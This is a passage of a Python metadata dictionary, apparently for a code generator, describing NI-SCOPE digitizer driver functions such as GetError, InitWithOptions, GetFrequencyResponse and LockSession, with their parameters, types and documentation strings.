'description': '\nReturns the channel string that is in the channel table at an index you\nspecify. Not applicable to National Instruments digitizers.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'A 1-based index into the channel table.'
},
'name': 'index',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nPasses the number of bytes in the ViChar array you specify for the\n**description** parameter.\n\nIf the error description, including the terminating NULL byte, contains\nmore bytes than you indicate in this parameter, the function copies\nBufferSize - 1 bytes into the buffer, places an ASCII NULL byte at the\nend of the buffer, and returns the buffer size you must pass to get the\nentire value. For example, if the value is "123456" and the Buffer Size\nis 4, the function places "123" into the buffer and returns 7.\n\nIf you pass a negative number, the function copies the value to the\nbuffer regardless of the number of bytes in the value.\n'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the channel string that is in the channel table at the index you\nspecify. Do not modify the contents of the channel string.\n'
},
'name': 'channelString',
'size': {
'mechanism': 'python-code',
'value': None
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'GetChannelNameFromString': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'name': 'index',
'type': 'ViConstString'
},
{
'direction': 'in',
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'name': 'name',
'size': {
'mechanism': 'ivi-dance',
'value': 'bufferSize'
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'GetEqualizationFilterCoefficients': {
'codegen_method': 'private',
'documentation': {
'description': '\nRetrieves the custom coefficients for the equalization FIR filter on the\ndevice. This filter is designed to compensate the input signal for\nartifacts introduced to the signal outside of the digitizer. Because\nthis filter is a generic FIR filter, any coefficients are valid.\nCoefficient values should be between +1 and –1.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channel',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The number of coefficients being passed in the **coefficients** array.'
},
'name': 'numberOfCoefficients',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nThe custom coefficients for the equalization FIR filter on the device.\nThese coefficients should be between +1 and –1. You can obtain the\nnumber of coefficients from the\n`NISCOPE_ATTR_EQUALIZATION_NUM_COEFFICIENTS <cviNISCOPE_ATTR_EQUALIZATION_NUM_COEFFICIENTS.html>`__\nattribute.\n'
},
'name': 'coefficients',
'size': {
'mechanism': 'passed-in',
'value': 'numberOfCoefficients'
},
'type': 'ViReal64[]'
}
],
'returns': 'ViStatus'
},
'GetError': {
'codegen_method': 'private',
'documentation': {
'description': '\nReads an error code and message from the error queue. National\nInstruments digitizers do not contain an error queue. Errors are\nreported as they occur. Therefore, this function does not detect errors.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'is_error_handling': True,
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nPasses the number of bytes in the ViChar array you specify for the\nDescription parameter.\n\nIf the error description, including the terminating NULL byte, contains\nmore bytes than you indicate in this parameter, the function copies\n**bufferSize** – 1 bytes into the buffer, places an ASCII NULL byte at\nthe end of the buffer, and returns the buffer size you must pass to get\nthe entire value. For example, if the value is "123456" and the Buffer\nSize is 4, the function places "123" into the buffer and returns 7.\n\nIf you pass a negative number, the function copies the value to the\nbuffer regardless of the number of bytes in the value.\n\nIf you pass 0, you can pass VI_NULL for the **description** parameter.\n'
},
'name': 'errorCode',
'type': 'ViStatus'
},
{
'direction': 'in',
'documentation': {
'description': '\nPass the Error Code that is returned from any of the instrument driver\nfunctions.\n'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the error description for the IVI session or execution thread.\n\nIf there is no description, the function returns an empty string. The\nbuffer must contain at least as many elements as the value you specify\nwith the Buffer Size parameter.\n\nIf you pass 0 for the **bufferSize**, you can pass VI_NULL for this\nparameter.\n'
},
'name': 'description',
'size': {
'mechanism': 'ivi-dance',
'value': 'bufferSize'
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus',
'use_session_lock': False
},
'GetErrorMessage': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns the error code from an NI-SCOPE function as a user-readable\nstring. Use VI_NULL as the default instrument handle.\n\nYou must call this function twice. For the first call, set\n**bufferSize** to 0 to prevent the function from populating the error\nmessage. Instead, the function returns the size of the error string. Use\nthe returned size to create a buffer, then call the function again,\npassing in the new buffer and setting **bufferSize** equal to the size\nthat was returned in the first function call.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe error code that is returned from any of the instrument driver\nfunctions.\n'
},
'name': 'errorCode',
'type': 'ViStatus'
},
{
'direction': 'in',
'documentation': {
'description': 'The number of characters you specify for the **errorMessage** parameter.'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns a char buffer that will be populated with the error message. It\nshould be at least as large as the buffer size.\n'
},
'name': 'errorMessage',
'size': {
'mechanism': 'ivi-dance',
'value': 'bufferSize'
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'GetFrequencyResponse': {
'codegen_method': 'no',
'documentation': {
'description': '\nGets the frequency response of the digitizer for the current\nconfigurations of the channel attributes. Not all digitizers support\nthis function.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channel',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe array size for the frequencies, amplitudes, and phases arrays that\nyou pass in to the other parameters.\n\nTo determine the sizes of the buffers to allocate for the frequencies,\namplitudes, and phases arrays, pass a value of 0 to the **buffer_size**\nparameter and a value of NULL to the **frequencies** parameter. In this\ncase, the value returned by the **numberOfFrequencies** parameter is the\nsize of the arrays necessary to hold the frequencies, amplitudes, and\nphases. Allocate three arrays of this size, then call this function\nagain (with correct **buffer_size** parameter) to retrieve the actual\nvalues.\n'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nThe array of frequencies that corresponds with the amplitude and phase\nresponse of the device.\n'
},
'name': 'frequencies',
'size': {
'mechanism': 'passed-in',
'value': 'bufferSize'
},
'type': 'ViReal64[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
'description': '\nThe array of amplitudes that correspond with the magnitude response of\nthe device.\n'
},
'name': 'amplitudes',
'size': {
'mechanism': 'passed-in',
'value': 'bufferSize'
},
'type': 'ViReal64[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
'description': '\nThe array of phases that correspond with the phase response of the\ndevice.\n'
},
'name': 'phases',
'size': {
'mechanism': 'passed-in',
'value': 'bufferSize'
},
'type': 'ViReal64[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
'description': 'Returns the number of frequencies in the returned spectrum.'
},
'name': 'numberOfFrequencies',
'type': 'ViInt32',
'use_in_python_api': False
}
],
'returns': 'ViStatus'
},
'GetNextCoercionRecord': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns the coercion information associated with the IVI session. This\nfunction retrieves and clears the oldest instance in which the\ninstrument driver coerced a value you specified to another value.\n\nIf you set NISCOPE_ATTR_RECORD_COERCIONS to VI_TRUE, NI-SCOPE keeps\na list of all coercions it makes on ViInt32 or ViReal64 values that you\npass to instrument driver functions. Use this function to retrieve\ninformation from that list.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nPasses the number of bytes in the ViChar array you specify for the\nDescription parameter.\n\nIf the error description, including the terminating NULL byte, contains\nmore bytes than you indicate in this parameter, the function copies\n**bufferSize** – 1 bytes into the buffer, places an ASCII NULL byte at\nthe end of the buffer, and returns the buffer size you must pass to get\nthe entire value. For example, if the value is "123456" and the\n**bufferSize** is 4, the function places "123" into the buffer and\nreturns 7.\n\nIf you pass a negative number, the function copies the value to the\nbuffer regardless of the number of bytes in the value.\n\nIf you pass 0, you can pass VI_NULL for the Description buffer\nparameter.\n'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the next coercion record for the IVI session. If there are no\ncoercions records, the function returns an empty string. The buffer must\ncontain at least as many elements as the value you specify with the\n**bufferSize** parameter.\n'
},
'name': 'record',
'size': {
'mechanism': 'ivi-dance',
'value': 'bufferSize'
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'GetNextInterchangeWarning': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns the interchangeability warnings associated with the IVI session.\nIt retrieves and clears the oldest instance in which the class driver\nrecorded an interchangeability warning. Interchangeability warnings\nindicate that using your application with a different instrument might\ncause different behavior.\n\nUse this function to retrieve interchangeability warnings. The driver\nperforms interchangeability checking when\nNISCOPE_ATTR_INTERCHANGE_CHECK is set to VI_TRUE. The function\nreturns an empty string in the **interchangeWarning** parameter if no\ninterchangeability warnings remain for the session.\n\nIn general, the instrument driver generates interchangeability warnings\nwhen an attribute that affects the behavior of the instrument is in a\nstate that you did not specify.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nPasses the number of bytes in the ViChar array you specify for the\n**Description** parameter.\n\nIf the error description, including the terminating NULL byte, contains\nmore bytes than you indicate in this parameter, the function copies\n**bufferSize**; – 1 bytes into the buffer, places an ASCII NULL byte at\nthe end of the buffer, and returns the buffer size you must pass to get\nthe entire value. For example, if the value is "123456" and the Buffer\nSize is 4, the function places "123" into the buffer and returns 7.\n\nIf you pass a negative number, the function copies the value to the\nbuffer regardless of the number of bytes in the value.\n\nIf you pass 0, you can pass VI_NULL for the Description buffer\nparameter.\n'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the next interchange warning for the IVI session. If there are\nno interchange warnings, the function returns an empty string. The\nbuffer must contain at least as many elements as the value you specify\nwith the **bufferSize** parameter.\n'
},
'name': 'interchangeWarning',
'size': {
'mechanism': 'ivi-dance',
'value': 'bufferSize'
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'GetNormalizationCoefficients': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns coefficients that can be used to convert binary data to\nnormalized and calibrated data.\n\nRefer to `Scaling and Normalization of Binary\nData <Digitizers.chm::/scaling_and_norm_binary_data.html>`__ for more\ninformation about how to use this function.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe array size for the **coefficentInfo** parameter.\n\nTo determine the size of the buffer to allocate for **coefficientInfo**,\npass a value of 0 to the **buffersize** parameter and a value of NULL to\nthe **coefficientInfo** parameter. In this case, the return value of the\n**numberOfCoefficientSets** parameter is the size of the array necessary\nto hold the coefficient structures. Allocate an array of\nniScope_coefficientInfo structures of this size, then call this\nfunction again (with the correct **bufferSize** parameter) to retrieve\nthe actual values.\n'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nAn array of structures containing gain and offset coefficients for a\ngiven channel.\n'
},
'name': 'coefficientInfo',
'size': {
'mechanism': 'ivi-dance-with-a-twist',
'value': 'bufferSize',
'value_twist': 'numberOfCoefficientSets'
},
'type': 'niScope_coefficientInfo[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the number of coefficient sets returned in the\n**coefficientInfo** array.\n'
},
'name': 'numberOfCoefficientSets',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'GetScalingCoefficients': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns coefficients that can be used to scale binary data to volts.\n\nRefer to `Scaling and Normalization of Binary\nData <Digitizers.chm::/scaling_and_norm_binary_data.html>`__ for more\ninformation about how to use this function.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe array size for the **coefficentInfo** parameter.\n\nTo determine the size of the buffer to allocate for **coefficientInfo**,\npass a value of 0 to the **buffersize** parameter and a value of NULL to\nthe **coefficientInfo** parameter. In this case, the return value of the\n**numberOfCoefficientSets** parameter is the size of the array necessary\nto hold the coefficient structures. Allocate an array of\nniScope_coefficientInfo structures of this size, then call this\nfunction again (with the correct **bufferSize** parameter) to retrieve\nthe actual values.\n'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nAn array of structures containing gain and offset coefficients for a\ngiven channel.\n'
},
'name': 'coefficientInfo',
'size': {
'mechanism': 'ivi-dance-with-a-twist',
'value': 'bufferSize',
'value_twist': 'numberOfCoefficientSets'
},
'type': 'niScope_coefficientInfo[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the number of coefficient sets returned in the\n**coefficientInfo** array.\n'
},
'name': 'numberOfCoefficientSets',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'GetStreamEndpointHandle': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns a writer endpoint that can be used with NI-P2P to configure a\npeer-to-peer stream with a digitizer endpoint.\n\n- `Peer-to-Peer Streaming <digitizers.chm::/5160_P2P.html>`__\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe stream endpoint FIFO to configure. Refer to the device-specific\ndocumentation for peer-to-peer streaming in the *High-Speed Digitizers\nHelp* for more information.\n'
},
'name': 'streamName',
'type': 'ViConstString'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns a reference to a peer-to-peer writer FIFO that can be used to\ncreate a peer-to-peer streaming session.\n'
},
'name': 'writerHandle',
'type': 'ViUInt32'
}
],
'returns': 'ViStatus'
},
'ImportAttributeConfigurationBuffer': {
'documentation': {
'description': '\nImports an attribute configuration to the session from the specified\nconfiguration buffer.\n\nYou can export and import session attribute configurations only between\ndevices with identical model numbers, channel counts, and onboard memory\nsizes.\n\n**Related Topics:**\n\n`Attributes and Attribute\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(attributes_and_attribute_functions)>`__\n\n`Setting Attributes Before Reading\nAttributes <REPLACE_DRIVER_SPECIFIC_URL_1(setting_before_reading_attributes)>`__\n',
'note': '\nYou cannot call this function while the session is in a running state,\nsuch as while acquiring a signal.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the size, in bytes, of the byte array to import. If you enter\n0, this function returns the needed size.\n'
},
'name': 'sizeInBytes',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the byte array buffer that contains the attribute\nconfiguration to import.\n'
},
'name': 'configuration',
'size': {
'mechanism': 'len',
'value': 'sizeInBytes'
},
'type': 'ViInt8[]'
}
],
'returns': 'ViStatus'
},
'ImportAttributeConfigurationFile': {
'documentation': {
'description': '\nImports an attribute configuration to the session from the specified\nfile.\n\nYou can export and import session attribute configurations only between\ndevices with identical model numbers, channel counts, and onboard memory\nsizes.\n\n**Related Topics:**\n\n`Attributes and Attribute\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(attributes_and_attribute_functions)>`__\n\n`Setting Attributes Before Reading\nAttributes <REPLACE_DRIVER_SPECIFIC_URL_1(setting_before_reading_attributes)>`__\n',
'note': '\nYou cannot call this function while the session is in a running state,\nsuch as while acquiring a signal.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the absolute path to the file containing the attribute\nconfiguration to import. If you specify an empty or relative path, this\nfunction returns an error.\n**Default File Extension:** .niscopeconfig\n'
},
'name': 'filePath',
'type': 'ViConstString'
}
],
'returns': 'ViStatus'
},
'InitWithOptions': {
'codegen_method': 'private',
'documentation': {
'description': '\nPerforms the following initialization actions:\n\n- Creates a new IVI instrument driver and optionally sets the initial\n state of the following session properties: Range Check, Cache,\n Simulate, Record Value Coercions\n- Opens a session to the specified device using the interface and\n address you specify for the **resourceName**\n- Resets the digitizer to a known state if **resetDevice** is set to\n VI_TRUE\n- Queries the instrument ID and verifies that it is valid for this\n instrument driver if the **IDQuery** is set to VI_TRUE\n- Returns an instrument handle that you use to identify the instrument\n in all subsequent instrument driver function calls\n'
},
'method_name_for_documentation': '__init__',
'parameters': [
{
'direction': 'in',
'documentation': {
'caution': '\nTraditional NI-DAQ and NI-DAQmx device names are not case-sensitive.\nHowever, all IVI names, such as logical names, are case-sensitive. If\nyou use logical names, driver session names, or virtual names in your\nprogram, you must make sure that the name you use matches the name in\nthe IVI Configuration Store file exactly, without any variations in the\ncase of the characters.\n',
'description': '\n| Specifies the resource name of the device to initialize\n\nFor Traditional NI-DAQ devices, the syntax is DAQ::\\ *n*, where *n* is\nthe device number assigned by MAX, as shown in Example 1.\n\nFor NI-DAQmx devices, the syntax is just the device name specified in\nMAX, as shown in Example 2. Typical default names for NI-DAQmx devices\nin MAX are Dev1 or PXI1Slot1. You can rename an NI-DAQmx device by\nright-clicking on the name in MAX and entering a new name.\n\nAn alternate syntax for NI-DAQmx devices consists of DAQ::NI-DAQmx\ndevice name, as shown in Example 3. This naming convention allows for\nthe use of an NI-DAQmx device in an application that was originally\ndesigned for a Traditional NI-DAQ device. For example, if the\napplication expects DAQ::1, you can rename the NI-DAQmx device to 1 in\nMAX and pass in DAQ::1 for the resource name, as shown in Example 4.\n\nIf you use the DAQ::\\ *n* syntax and an NI-DAQmx device name already\nexists with that same name, the NI-DAQmx device is matched first.\n\nYou can also pass in the name of an IVI logical name or an IVI virtual\nname configured with the IVI Configuration utility, as shown in Example\n5. A logical name identifies a particular virtual instrument. A virtual\nname identifies a specific device and specifies the initial settings for\nthe session.\n',
'table_body': [
[
'1',
'Traditional NI-DAQ device',
'DAQ::1 (1 = device number)'
],
[
'2',
'NI-DAQmx device',
'myDAQmxDevice (myDAQmxDevice = device name)'
],
[
'3',
'NI-DAQmx device',
'DAQ::myDAQmxDevice (myDAQmxDevice = device name)'
],
[
'4',
'NI-DAQmx device',
'DAQ::2 (2 = device name)'
],
[
'5',
'IVI logical name or IVI virtual name',
'myLogicalName (myLogicalName = name)'
]
],
'table_header': [
'Example',
'Device Type',
'Syntax'
]
},
'name': 'resourceName',
'type': 'ViRsrc'
},
{
'default_value': False,
'direction': 'in',
'documentation': {
'description': '\nSpecify whether to perform an ID query.\n\nWhen you set this parameter to VI_TRUE, NI-SCOPE verifies that the\ndevice you initialize is a type that it supports.\n\nWhen you set this parameter to VI_FALSE, the function initializes the\ndevice without performing an ID query.\n\n**Defined Values**\n\n| VI_TRUE—Perform ID query\n| VI_FALSE—Skip ID query\n\n**Default Value**: VI_TRUE\n'
},
'name': 'idQuery',
'type': 'ViBoolean'
},
{
'default_value': False,
'direction': 'in',
'documentation': {
'description': '\nSpecify whether to reset the device during the initialization process.\n\nDefault Value: VI_TRUE\n\n**Defined Values**\n\nVI_TRUE (1)—Reset device\n\nVI_FALSE (0)—Do not reset device\n',
'note': '\nFor the NI 5112, repeatedly resetting the device may cause excessive\nwear on the electromechanical relays. Refer to `NI 5112\nElectromechanical Relays <REPLACE_DRIVER_SPECIFIC_URL_1(5112_relays)>`__\nfor recommended programming practices.\n'
},
'name': 'resetDevice',
'type': 'ViBoolean'
},
{
'default_value': '""',
'direction': 'in',
'documentation': {
'description': '\n| Specifies initialization commands. The following table lists the\n attributes and the name you use in the **optionString** to identify\n the attribute.\n\nDefault Values: "Simulate=0,RangeCheck=1,QueryInstrStatus=1,Cache=1"\n\nYou can use the option string to simulate a device. The DriverSetup flag\nspecifies the model that is to be simulated and the type of the model.\nOne example to simulate an NI PXI-5102 would be as follows:\n\nOption String: Simulate = 1, DriverSetup = Model:5102; BoardType:PXI\n\nRefer to the example niScope EX Simulated Acquisition for more\ninformation on simulation.\n\nYou can also use the option string to attach an accessory such as the\nNI 5900 to your digitizer session to allow the seamless use of the\naccessory:\n\nOption String: DriverSetup = Accessory:Dev1\n\nRefer to the example niScope EX External Amplifier for more information.\n',
'table_body': [
]
},
'name': 'optionString',
'python_api_converter_name': 'convert_init_with_options_dictionary',
'type': 'ViConstString',
'type_in_documentation': 'dict'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns a session handle that you can use to identify the device in all\nsubsequent NI-SCOPE function calls.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus',
'use_session_lock': False
},
'InitiateAcquisition': {
'codegen_method': 'private',
'documentation': {
'description': '\nInitiates a waveform acquisition.\n\nAfter calling this function, the digitizer leaves the Idle state and\nwaits for a trigger. The digitizer acquires a waveform for each channel\nyou enable with niScope_ConfigureVertical.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'IsDeviceReady': {
'codegen_method': 'no',
'documentation': {
'description': '\nCall this function to determine whether the device is ready for use or\nthe device is still undergoing initialization.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'caution': '\nTraditional NI-DAQ and NI-DAQmx device names are not case-sensitive.\nHowever, all IVI names, such as logical names, are case-sensitive. If\nyou use logical names, driver session names, or virtual names in your\nprogram, you must make sure that the name you use matches the name in\nthe IVI Configuration Store file exactly, without any variations in the\ncase of the characters.\n',
'description': '\n**resourceName** specifies the resource name of the device to\ninitialize.\n\nresourceName Examples\n\nFor Traditional NI-DAQ devices, the syntax is DAQ::\\ *n*, where *n* is\nthe device number assigned by MAX, as shown in Example 1.\n\nFor NI-DAQmx devices, the syntax is just the device name specified in\nMAX, as shown in Example 2. Typical default names for NI-DAQmx devices\nin MAX are Dev1 or PXI1Slot1. You can rename an NI-DAQmx device by\nright-clicking on the name in MAX and entering a new name.\n\nAn alternate syntax for NI-DAQmx devices consists of DAQ::\\ *NI-DAQmx\ndevice name*, as shown in Example 3. This naming convention allows for\nthe use of an NI-DAQmx device in an application that was originally\ndesigned for a Traditional NI-DAQ device. For example, if the\napplication expects DAQ::1, you can rename the NI-DAQmx device to 1 in\nMAX and pass in DAQ::1 for the resource name, as shown in Example 4.\n\nIf you use the DAQ::\\ *n* syntax and an NI-DAQmx device name already\nexists with that same name, the NI-DAQmx device is matched first.\n\nYou can also pass in the name of an IVI logical name or an IVI virtual\nname configured with the IVI Configuration utility, as shown in Example\n5. A logical name identifies a particular virtual instrument. A virtual\nname identifies a specific device and specifies the initial settings for\nthe session.\n',
'table_body': [
[
'1',
'Traditional NI-DAQ device',
'DAQ::\\ *1*',
'(*1* = device number)'
],
[
'2',
'NI-DAQmx device',
'*myDAQmxDevice*',
'(*myDAQmxDevice* = device name)'
],
[
'3',
'NI-DAQmx device',
'DAQ::\\ *myDAQmxDevice*',
'(*myDAQmxDevice* = device name)'
],
[
'4',
'NI-DAQmx device',
'DAQ::\\ *2*',
'(*2* = device name)'
]
],
'table_header': [
'Example #',
'Device Type',
'Syntax',
'Variable'
]
},
'name': 'resourceName',
'type': 'ViRsrc'
},
{
'direction': 'in',
'documentation': {
'description': '\nUse only "" or a null pointer. If you specify a channel, NI-SCOPE will\nreturn an error.\n'
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns True if the device is ready to use, or False if the device is\nstill initializing.\n'
},
'name': 'deviceReady',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'IsInvalidWfmElement': {
'codegen_method': 'no',
'documentation': {
'description': '\nDetermines whether a value you pass from the waveform array is invalid.\nAfter the read and fetch waveform functions execute, each element in the\nwaveform array contains either a voltage or a value indicating that the\ninstrument could not sample a voltage.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nPass one of the values from the waveform array returned by the read and\nfetch waveform functions.\n'
},
'name': 'elementValue',
'type': 'ViReal64'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns whether the element value is a valid voltage or a value\nindicating that the digitizer could not sample a voltage.\n\nReturn values:\n\n| VI_TRUE—The element value indicates that the instrument could not\n sample the voltage.\n| VI_FALSE—The element value is a valid voltage.\n'
},
'name': 'isInvalid',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'LockSession': {
'documentation': {
'description': '\nObtains a multithread lock on the instrument session. Before doing so,\nit waits until all other execution threads have released their locks on\nthe instrument session. Other threads might have obtained a lock on this\nsession in the following ways:\n\n- Your application called niScope_LockSession\n- A call to the instrument driver locked the session\n- A call to the IVI engine locked the session\n\nAfter your call to niScope_LockSession returns successfully, no other\nthreads can access the instrument session until you call\nniScope_UnlockSession. Use niScope_LockSession and\nniScope_UnlockSession around a sequence of calls to instrument driver\nfunctions if you require that the instrument retain its settings through\nthe end of the sequence.\n\nYou can safely make nested calls to niScope_LockSession within the same\nthread. To completely unlock the session, you must balance each call to\nniScope_LockSession with a call to niScope_UnlockSession. If, however,\nyou use the **callerHasLock** in all calls to niScope_LockSession and\nniScope_UnlockSession within a function, the IVI Library locks the\nsession only once within the function regardless of the number of calls\nyou make to niScope_LockSession. This allows you to call\nniScope_UnlockSession just once at the end of the function.\n'
},
'method_templates': [
{
'documentation_filename': 'lock',
'method_python_name_suffix': '',
'session_filename': 'lock'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nThis parameter serves as a convenience. If you do not want to use this\nparameter, pass VI_NULL.\n\nUse this parameter in complex functions to keep track of whether you\nhave obtained a lock and therefore need to unlock the session. Pass the\naddress of a local ViBoolean variable. In the declaration of the local\nvariable, initialize it to VI_FALSE. Pass the address of the same local\nvariable to any other calls you make to niScope_LockSession or\nniScope_UnlockSession in the same function.\n'
},
'name': 'callerHasLock',
'type': 'ViBoolean'
}
],
'python_name': 'lock',
'render_in_session_base': True,
'returns': 'ViStatus',
'use_session_lock': False
},
'ProbeCompensationSignalStart': {
'documentation': {
'description': 'Starts the 1 kHz square wave output on PFI 1 for probe compensation.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ProbeCompensationSignalStop': {
'documentation': {
'description': 'Stops the 1 kHz square wave output on PFI 1 for probe compensation.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'Read': {
'codegen_method': 'private',
'documentation': {
